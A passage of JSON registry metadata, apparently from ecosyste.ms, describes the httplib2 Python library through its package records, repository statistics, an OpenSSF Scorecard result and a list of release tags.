anifests"},{"name":"v0.9","sha":"058a1f9448d5c27c23772796f83a596caf9188e6","kind":"commit","published_at":"2014-04-15T12:53:06.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.9","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.9/manifests"},{"name":"0.9","sha":"0197ec868a4fc638c08358b94200ffd6ddb1bf50","kind":"tag","published_at":"2014-04-14T12:50:10.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/0.9","html_url":"https://github.com/httplib2/httplib2/releases/tag/0.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@0.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9/manifests"}]},"repo_metadata_updated_at":"2026-08-21T12:54:59.085Z","dependent_packages_count":3,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":0.0,"dependent_packages_count":9.02704969595303,"stargazers_count":5.116376598867687,"forks_count":3.5961417487942966,"average":4.434892010903753},"purl":"pkg:apk/alpine/py3-httplib2?arch=x86_64\u0026repository_url=https://pkgs.alpinelinux.org/packages?branch=v3.8","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/alpine/py3-httplib2","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/alpine/py3-httplib2","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/alpine/py3-httplib2/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-20T11:37:11.797Z","issues_count":64,"pull_requests_count":61,"avg_time_to_close_issue":13710979.942857143,"avg_time_to_close_pull_request":12412190.204545455,"issues_closed_count":35,"pull_requests_closed_count":44,"pull_request_authors_count":42,"issue_authors_count":59,"avg_comments_per_issue":3.796875,"avg_comments_per_pull_request":2.4098360655737703,"merged_pull_requests_count":31,"bot_issues_count":0,"bot_pull_requests_count":4,"past_year_issues_count":5,"past_year_pull_requests_count":5,"past_year_avg_time_to_close_issue":520238.0,"past_year_avg_time_to_close_pull_request":596027.3333333334,"past_year_issues_closed_count":3,"past_year_pull_requests_closed_count":3,"past_year_pull_request_authors_count":5,"past_year_issue_authors_count":5,"past_year_avg_comments_per_issue":2.4,"past_year_avg_comments_per_pull_request":0.8,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":1,"past_year_merged_pull_requests_count":3,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/issues","maintainers":[{"login":"temoto","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/temoto"}],"active_maintainers":[{"login":"temoto","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/temoto"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.8/packages/py3-httplib2/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.8/packages/py3-httplib2/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.8/packages/py3-httplib2/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.8/packages/py3-httplib2/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.8/packages/py3-httplib2/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.8/packages/py3-httplib2/codemeta","maintainers":[{"uuid":"fabian@affolter-engineering.ch","login":null,"name":"Fabian Affolter","email":null,"url":"https://pkgs.alpinelinux.org/packages?maintainer=Fabian Affolter","packages_count":248,"html_url":"https://pkgs.alpinelinux.org/packages?maintainer=Fabian Affolter","role":null,"created_at":"2023-02-01T07:39:30.380Z","updated_at":"2023-02-01T07:39:30.380Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.8/maintainers/fabian@affolter-engineering.ch/packages"}],"registry":{"name":"alpine-v3.8","url":"https://pkgs.alpinelinux.org/packages?branch=v3.8","ecosystem":"alpine","default":false,"packages_count":9538,"maintainers_count":148,"namespaces_count":2,"keywords_count":770,"github":"alpinelinux","metadata":{"repos":["main","community"],"funded_packages_count":337},"icon_url":"https://github.com/alpinelinux.png","created_at":"2023-01-31T17:27:50.817Z","updated_at":"2026-08-12T05:03:16.204Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.8/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.8/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.8/namespaces"}},{"id":12815490,"name":"python310Packages.httplib2","ecosystem":"nixpkgs","description":"A comprehensive HTTP client library","homepage":"https://github.com/httplib2/httplib2","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/httplib2/httplib2","keywords_array":["python"],"namespace":null,"versions_count":1,"first_release_published_at":"2026-01-26T17:08:02.386Z","latest_release_published_at":"2026-01-26T17:08:02.386Z","latest_release_number":"0.21.0","last_synced_at":"2026-04-17T17:05:08.629Z","created_at":"2026-01-26T17:08:02.230Z","updated_at":"2026-08-21T13:16:28.742Z","registry_url":"https://search.nixos.org/packages?channel=23.05\u0026query=python310Packages.httplib2","install_command":"nix-env -iA nixpkgs.python310Packages.httplib2","documentation_url":"https://github.com/NixOS/nixpkgs/blob/nixos-23.05/pkgs/development/python-modules/httplib2/default.nix#L74","metadata":{"nix_attribute":"python3.10-httplib2-0.21.0","position":"pkgs/development/python-modules/httplib2/default.nix:74","platforms":["aarch64-linux","armv5tel-linux","armv6l-linux","armv7a-linux","armv7l-linux","i686-linux","loongarch64-linux","m68k-linux","microblaze-linux","microblazeel-linux","mipsel-linux","mips64el-linux","powerpc64-linux","powerpc64le-linux","riscv32-linux","riscv64-linux","s390-linux","s390x-linux","x86_64-linux","x86_64-darwin","i686-darwin","aarch64-darwin","armv7a-darwin"],"broken":false,"insecure":false,"unfree":false,"outputs":["dist","out"],"upstream_ecosystem":"pypi","upstream_name":"httplib2","upstream_purl":"pkg:pypi/httplib2"},"repo_metadata":{"id":5379896,"uuid":"53002916","full_name":"httplib2/httplib2","owner":"httplib2","description":"Small, fast HTTP client library for Python. Features persistent connections, cache, and Google App Engine support. Originally written by Joe Gregorio, now supported by community.","archived":false,"fork":false,"pushed_at":"2026-06-26T10:10:15.000Z","size":3934,"stargazers_count":511,"open_issues_count":63,"forks_count":189,"subscribers_count":22,"default_branch":"master","last_synced_at":"2026-08-14T10:56:27.493Z","etag":null,"topics":["http","http-client","network","python"],"latest_commit_sha":null,"homepage":"http://httplib2.readthedocs.io/","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"other","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/httplib2.png","metadata":{"files":{"readme":"README.md","changelog":"CHANGELOG","contributing":"contributing.md","funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null}},"created_at":"2016-03-02T22:59:52.000Z","updated_at":"2026-08-14T08:37:00.000Z","dependencies_parsed_at":"2024-06-18T12:23:46.605Z","dependency_job_id":"dbfee945-96d9-41e9-8932-65c2aca77af6","html_url":"https://github.com/httplib2/httplib2","commit_stats":{"total_commits":538,"total_committers":73,"mean_commits":7.36986301369863,"dds":0.6561338289962826,"last_synced_commit":"09eee8a81f552cbaa74f603f2dd9bcc3311ff6d7"},"previous_names":[],"tags_count":43,"template":false,"template_full_name":null,"purl":"pkg:github/httplib2/httplib2","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/httplib2","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/refs/heads/master","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/sbom","scorecard":{"id":471277,"data":{"date":"2025-08-11","repo":{"name":"github.com/httplib2/httplib2","commit":"1a6ff781792099e9e14d7beb610bd99112b17b07"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.4,"checks":[{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Code-Review","score":3,"reason":"Found 10/27 approved changesets -- score normalized to 3","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: SECURITY.md:1","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Maintained","score":1,"reason":"2 commit(s) and 0 issue activity found in the last 90 days -- score normalized to 1","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: no topLevel permission defined: .github/workflows/publish.yaml:1","Warn: no topLevel permission defined: .github/workflows/style.yaml:1","Warn: no topLevel permission defined: .github/workflows/test.yaml:1","Info: no jobLevel write permissions found"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:18: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:21: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:45: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:61: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:69: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:75: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:99: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:107: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:113: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/style.yaml:13: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/style.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/style.yaml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/style.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yaml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/test.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yaml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/test.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yaml:55: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/test.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yaml:58: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/test.yaml/master?enable=pin","Warn: pipCommand not pinned by hash: script/test:28","Warn: pipCommand not pinned by hash: script/test:36","Warn: pipCommand not pinned by hash: script/test:42","Warn: pipCommand not pinned by hash: .github/workflows/publish.yaml:112","Warn: pipCommand not pinned by hash: .github/workflows/publish.yaml:35","Warn: pipCommand not pinned by hash: .github/workflows/publish.yaml:74","Warn: pipCommand not pinned by hash: .github/workflows/style.yaml:26","Warn: pipCommand not pinned by hash: .github/workflows/test.yaml:42","Warn: pipCommand not pinned by hash: .github/workflows/test.yaml:44","Warn: pipCommand not pinned by hash: .github/workflows/test.yaml:69","Info:   0 out of  16 GitHub-owned GitHubAction dependencies pinned","Info:   1 out of  11 pipCommand dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Fuzzing","score":10,"reason":"project is fuzzed","details":["Info: OSSFuzz integration found","Info: PythonAtherisFuzzer integration found: tests/fuzz_request.py:2","Info: PythonAtherisFuzzer integration found: tests/fuzz_url.py:2"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"License","score":9,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Warn: project license file does not contain an FSF or OSI license."],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Branch-Protection","score":-1,"reason":"internal error: error during branchesHandler.setup: internal error: githubv4.Query: Resource not accessible by integration","details":null,"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Vulnerabilities","score":9,"reason":"1 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-79v4-65xg-pq4g"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 16 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}}]},"last_synced_at":"2025-08-19T13:56:43.862Z","repository_id":5379896,"created_at":"2025-08-19T13:56:43.862Z","updated_at":"2025-08-19T13:56:43.862Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36646944,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-06T04:43:03.162Z","status":"online","status_checked_at":"2026-08-14T02:00:06.934Z","response_time":54,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"httplib2","name":"httplib2","uuid":"17128733","kind":"organization","description":"","email":null,"website":null,"location":null,"twitter":null,"company":null,"icon_url":"https://avatars.githubusercontent.com/u/17128733?v=4","repositories_count":1,"last_synced_at":"2024-03-25T18:41:02.027Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/httplib2","funding_links":[],"total_stars":482,"followers":7,"following":0,"created_at":"2022-11-02T16:22:04.713Z","updated_at":"2024-03-25T18:41:02.043Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/httplib2","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/httplib2/repositories"},"tags":[{"name":"v0.32.0","sha":"ba9bf505cd899f522f2bb58ca608444adf49afc1","kind":"commit","published_at":"2026-06-26T10:07:36.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.32.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.32.0/manifests"},{"name":"v0.31.2","sha":"a99a11fba8d5fa3bb9c47827e5cbfd641dfb88d3","kind":"commit","published_at":"2026-01-23T10:59:34.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.31.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.31.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.31.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.2/manifests"},{"name":"v0.31.1","sha":"6d2ea322d53a03d058cd8e63c12871cdd1127ca9","kind":"commit","published_at":"2026-01-13T12:08:01.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.31.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.1/manifests"},{"name":"v0.31.0","sha":"26cfea5d07a5817cf214d9978c856c91abf4e078","kind":"commit","published_at":"2025-09-11T12:04:48.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.31.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.0/manifests"},{"name":"v0.30.2","sha":"d9278ceafb7a05be9998a7a4b1cb7d6d3f689ee5","kind":"commit","published_at":"2025-09-10T17:35:30.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.30.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.30.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.30.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.2/manifests"},{"name":"v0.30.1","sha":"6cfe2e6b5aff994f07fa0dcddfacf6d3a7999b1b","kind":"commit","published_at":"2025-09-10T16:57:01.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.30.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.1/manifests"},{"name":"v0.30.0","sha":"ddfbfd579775027af57121d69f6bd913f01f9471","kind":"commit","published_at":"2025-08-29T17:58:43.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.30.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.0/manifests"},{"name":"v0.22.0","sha":"09eee8a81f552cbaa74f603f2dd9bcc3311ff6d7","kind":"commit","published_at":"2023-03-21T22:23:06.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.22.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.22.0/manifests"},{"name":"v0.21.0","sha":"3094c64ee75e13530c62217180bf2a983084257e","kind":"commit","published_at":"2022-10-29T12:27:41.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.21.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.21.0/manifests"},{"name":"v0.20.4","sha":"9d4501760c8ac66326d672ab5c94737d3d690ca4","kind":"commit","published_at":"2022-02-02T23:24:16.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.4","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.20.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.4/manifests"},{"name":"v0.20.3","sha":"b10764a31c28a9f1c4ca5c24ae62422985cd6781","kind":"commit","published_at":"2021-11-19T08:46:31.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.20.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.3/manifests"},{"name":"v0.20.2","sha":"f4efdff5003aa99799f304540bf139d7e08a92f2","kind":"commit","published_at":"2021-11-02T07:04:35.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.2/manifests"},{"name":"v0.20.1","sha":"41804463a5d1d56fd39511e4bcc215cf0ac1e357","kind":"commit","published_at":"2021-10-07T12:57:47.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.1/manifests"},{"name":"v0.20.0","sha":"a0d1e28d22ba8df56ef32f01830e12f47f39dccc","kind":"commit","published_at":"2021-10-07T08:50:11.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.0/manifests"},{"name":"v0.19.1","sha":"58e6f66804665884393ebbe83968c0c2c16c9f70","kind":"commit","published_at":"2021-03-30T16:03:13.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.19.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.19.1/manifests"},{"name":"v0.19.0","sha":"81e80d00c2b3cb51de6019cfd28b793184d7699a","kind":"commit","published_at":"2021-02-07T14:49:33.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.19.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib